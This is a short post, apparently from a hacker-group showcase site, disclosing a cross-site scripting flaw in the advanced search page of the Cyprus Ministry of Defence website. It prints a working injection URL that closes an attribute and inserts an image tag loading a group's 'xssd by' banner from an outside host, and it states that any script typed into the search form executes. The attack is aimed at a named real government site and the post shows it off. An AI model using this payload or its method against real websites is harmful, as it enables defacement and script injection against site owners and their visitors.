This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Go to top
18.191.174.168.US

Ministry of Defence Republic of Cyprus - XSS

Vulnerable page: http://www.mod.gov.cy/mod/mod.nsf/AdvancedSearch_en/AdvancedSearch_en?OpenForm

PoC
http://www.mod.gov.cy/mod/mod.nsf/AdvancedSearch_en/AdvancedSearch_en?OpenForm&q=&p=1&w=&t=&s="><img%20src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC


It is enough to insert any XSS code directly into search form and your code will be executed and displayed immediately.

Note: This is a proof of concept and it doesn't reflect the views or interests of above website.
Posted by Neo on 2016-08-23 21:33 2 likes

Comments

There are no comments for this news article, you can leave one here.